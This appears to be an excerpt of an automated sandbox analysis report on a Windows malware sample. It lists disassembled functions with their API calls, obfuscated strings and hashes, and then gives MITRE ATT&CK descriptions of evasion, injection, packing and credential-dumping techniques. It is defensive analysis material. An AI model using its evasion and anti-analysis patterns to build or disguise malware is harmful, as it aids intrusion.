
Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 3982efe7e8d0da8a06038be50c5490b5aa4dd6714f050852aabdf92f820ef895
Instruction ID: 950317061b0095c29fadf9183ea52f7ffedac7be607a61dc60530f93d8d7338d
Opcode Fuzzy Hash: 3982efe7e8d0da8a06038be50c5490b5aa4dd6714f050852aabdf92f820ef895
Instruction Fuzzy Hash: 9DD05E729543455ADB009F707C09BA63BECA784795F048836F81CC6190E67AC950D648

Non-executed Functions

Function 004189C0 Relevance: 77.3, APIs: 36, Strings: 8, Instructions: 310
librarymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000), ref: 00418A22
WriteConsoleOutputAttribute.KERNEL32(00000000,00000000,00000000,?,?), ref: 00418A6D
GetCommandLineW.KERNEL32 ref: 00418AB8
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
SetFocus.USER32(00000000), ref: 00418AE4
ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418AEF
FindAtomW.KERNEL32(00000000), ref: 00418AF6
SearchPathA.KERNEL32(wapopasihe,nemagutimebonefotekoneb,bopuwofebakuduwin,00000000,?,?), ref: 00418B1A
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00418B22
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418B3A
_memset.LIBCMT ref: 00418B50
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418B61
CopyFileExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418B6D
CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418B83
GetEnvironmentStringsW.KERNEL32 ref: 00418B89
WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418BCE
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00418BDD
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418BE6
ObjectPrivilegeAuditAlarmA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418BFB
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418C0C
SetCommMask.KERNEL32(00000000,00000000), ref: 00418C35
GetLastError.KERNEL32 ref: 00418C37
GetUserObjectInformationW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00418C4B
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00418C7A
GetComputerNameW.KERNEL32(?,?), ref: 00418C8E
GetConsoleAliasExesLengthW.KERNEL32 ref: 00418C94
GetBinaryTypeA.KERNEL32(bahujijudunogikawatihohelujof,?), ref: 00418CA6
PurgeComm.KERNEL32(00000000,00000000), ref: 00418CAE
_calloc.LIBCMT ref: 00418CB6
_calloc.LIBCMT ref: 00418CC9
LoadLibraryA.KERNEL32(msimg32.dll), ref: 00418D22
GlobalAlloc.KERNEL32(00000000,00000000), ref: 00418D4D
GetStdHandle.KERNEL32(00000000), ref: 00418D51
MoveFileW.KERNEL32(00000000,00000000), ref: 00418D57
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418D7E
GetFileAttributesA.KERNEL32(mufolomeragakowubicigero), ref: 00418DB7

Strings

bahujijudunogikawatihohelujof, xrefs: 00418CA1
k`, xrefs: 00418D5D
nemagutimebonefotekoneb, xrefs: 00418B10
mufolomeragakowubicigero, xrefs: 00418DB2
bopuwofebakuduwin, xrefs: 00418B0B
}$, xrefs: 00418D85
wapopasihe, xrefs: 00418B15
msimg32.dll, xrefs: 00418D1D

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: Console$File$CommObject$CompareExchangeInformationInterlockedLengthNameOutputPathSearchWrite_calloc$AdjustmentAlarmAliasAliasesAllocAtomAttributeAttributesAuditBinaryCommandComputerConfigCopyCreateDefaultEnvironmentErrorExesFindFocusGlobalHandleLastLibraryLineLoadMaskModeModuleMovePipePrivilegePurgeReadSingleStringsSystemTimeTypeUserVolumeWait_memset
String ID: bahujijudunogikawatihohelujof$bopuwofebakuduwin$k`$msimg32.dll$mufolomeragakowubicigero$nemagutimebonefotekoneb$wapopasihe$}$
API String ID: 2037564194-3937991245
Opcode ID: eef48b8247302c0322d3fbbae5623de215b702bdd2c4af31e6665b7a0e185c6f
Instruction ID: 14be8ff56781b1d00f5d5c610e1110d06a152b2d889af403ee48b93a4b1bf100
Opcode Fuzzy Hash: eef48b8247302c0322d3fbbae5623de215b702bdd2c4af31e6665b7a0e185c6f
Instruction Fuzzy Hash: EDB1C671901224ABCB209B65EC54BDF7B79EF59310F00806EF609A31A1DB385E84CFAD

Function 00401000 Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 004015E1
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004015F6
UnhandledExceptionFilter.KERNEL32(004191C8), ref: 00401601
GetCurrentProcess.KERNEL32(C0000409), ref: 0040161D
TerminateProcess.KERNEL32(00000000), ref: 00401624

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 3ad909b6b90c4a483299f4efeb9858d1b2e2074a893f7fabd4685953e4977760
Instruction ID: 217945b887690a3cba0a058b0b25a51199940e65b7871b73a09ffccea138bdfb
Opcode Fuzzy Hash: 3ad909b6b90c4a483299f4efeb9858d1b2e2074a893f7fabd4685953e4977760
Instruction Fuzzy Hash: 162199B8D01254DBC701EF69ED886C43BF4FB48314F10957AE928972A0E7B89981CF1E

Function 00418860 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD
sibepeyedupucis, xrefs: 004188D5

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
String ID: -$sibepeyedupucis
API String ID: 2332831159-1718117500
Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E

Function 00418896 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
OpenJobObjectA.KERNEL32(00000000,00000000,sibepeyedupucis), ref: 004188DE
BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0

Strings

-, xrefs: 004188FD
sibepeyedupucis, xrefs: 004188D5

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
String ID: -$sibepeyedupucis
API String ID: 1414951042-1718117500
Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A

Function 00418920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryDosDeviceA.KERNEL32(jutusenavocibiyaxunokubiyefet,?,00000000), ref: 00418957
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
HeapDestroy.KERNEL32(00000000), ref: 00418991
GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0

Strings

jutusenavocibiyaxunokubiyefet, xrefs: 00418952

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID: jutusenavocibiyaxunokubiyefet
API String ID: 4159173863-2484441926
Opcode ID: 21989151b632421131f4c7c56f4fafae63309cca12e68fa528237de0856bc472
Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
Opcode Fuzzy Hash: 21989151b632421131f4c7c56f4fafae63309cca12e68fa528237de0856bc472
Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

Function 00403501 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 0040350D

Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901

__amsg_exit.LIBCMT ref: 0040352D
__lock.LIBCMT ref: 0040353D
InterlockedDecrement.KERNEL32(?), ref: 0040355A
InterlockedIncrement.KERNEL32(021C2B00), ref: 00403585

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 0aed7e7151ab4baf51f7dba04ff00e2176f7cb80eebcd4767136a58f638b6b27
Instruction ID: c9b24788df6032b5e8d83d148620bdae6139370d5539738cc94659757c5284a0
Opcode Fuzzy Hash: 0aed7e7151ab4baf51f7dba04ff00e2176f7cb80eebcd4767136a58f638b6b27
Instruction Fuzzy Hash: C9018E32D41621BBCA11AF65AC4979E7B64BB00725F44813BE800B72E0C77C5E81DBCD

Function 0040100F Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0040102D

Part of subcall function 0040182D: __mtinitlocknum.LIBCMT ref: 00401843
Part of subcall function 0040182D: __amsg_exit.LIBCMT ref: 0040184F
Part of subcall function 0040182D: EnterCriticalSection.KERNEL32(?,?,?,0040258D,00000004,0041A548,0000000C,004010B7,?,?,00000000), ref: 00401857

___sbh_find_block.LIBCMT ref: 00401038
___sbh_free_block.LIBCMT ref: 00401047
HeapFree.KERNEL32(00000000,?,0041A4C0,0000000C,004028E2,00000000,?,00402BD8,?,00000001,?,?,004017B7,00000018,0041A528,0000000C), ref: 00401077
GetLastError.KERNEL32(?,00402BD8,?,00000001,?,?,004017B7,00000018,0041A528,0000000C,00401848,?,?,?,0040258D,00000004), ref: 00401088

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 96826c8bce20cf7747eed3c6d1812a17504a8492c0699d22cdc648d00a0bdf6b
Instruction ID: d79da508b191636924feb9bb703fa05d08103c1c15f778b52bc5afb354a6ee72
Opcode Fuzzy Hash: 96826c8bce20cf7747eed3c6d1812a17504a8492c0699d22cdc648d00a0bdf6b
Instruction Fuzzy Hash: 23018672D01345AADF30BBB29C1AB9E7B64AF01764F10853FF544B65E1CB7C8A808A5D

Function 00408484 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(KERNEL32,004040A0), ref: 00408489
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408499

Strings

IsProcessorFeaturePresent, xrefs: 00408493
KERNEL32, xrefs: 00408484

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 785ef883bb071d89224ecbe7b56862408099ec01593bd5a08af74b78da1345b5
Instruction ID: d89e428fcb06b5c873902683785430d8b2f812fdf6616deba67c602ba2f5fa64
Opcode Fuzzy Hash: 785ef883bb071d89224ecbe7b56862408099ec01593bd5a08af74b78da1345b5
Instruction Fuzzy Hash: 76F06D30A00A0AD2EF002BB0AD0A3AF7A74BB80716F9241A5D5C2B01C4DE3980B5825B

Function 00408370 Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__cftof_l.LIBCMT ref: 00408396

Part of subcall function 004081BB: __fltout2.LIBCMT ref: 004081E7

__cftog_l.LIBCMT ref: 004083BC
__cftoe_l.LIBCMT ref: 004083EE

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: 90881730480e07db8bfbb96aa53543ddcb4327a5d8f2a223ca44fba9169e931e
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: FD11753200414EFBCF125E85DD41CEE3F22BF58754B58842AFE9865271DA3BC972AB85

Function 00403C6D Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00403C79

Part of subcall function 004028F1: __getptd_noexit.LIBCMT ref: 004028F4
Part of subcall function 004028F1: __amsg_exit.LIBCMT ref: 00402901

__getptd.LIBCMT ref: 00403C90
__amsg_exit.LIBCMT ref: 00403C9E
__lock.LIBCMT ref: 00403CAE

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: d1964fccce5ab0380f80ada0cc5861ce8dc2287240387a93fb18a9f4d0170a82
Instruction ID: 2499cd3afa89d3b98fba8cf9bf6429c0b2f2ec4b7213c6cb13e6104a5384003f
Opcode Fuzzy Hash: d1964fccce5ab0380f80ada0cc5861ce8dc2287240387a93fb18a9f4d0170a82
Instruction Fuzzy Hash: 21F06233944700CAE711BF7A890A78977A47F00719F10813FE840F72D1CBBC9A019A5E

Function 00418680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C

Strings

, xrefs: 004186C5

Memory Dump Source

Source File: 00000022.00000002.3873754332.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000022.00000002.3873618693.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874005215.0000000000419000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874372636.000000000041C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000022.00000002.3874672726.0000000000515000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_400000_fihcrfb.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
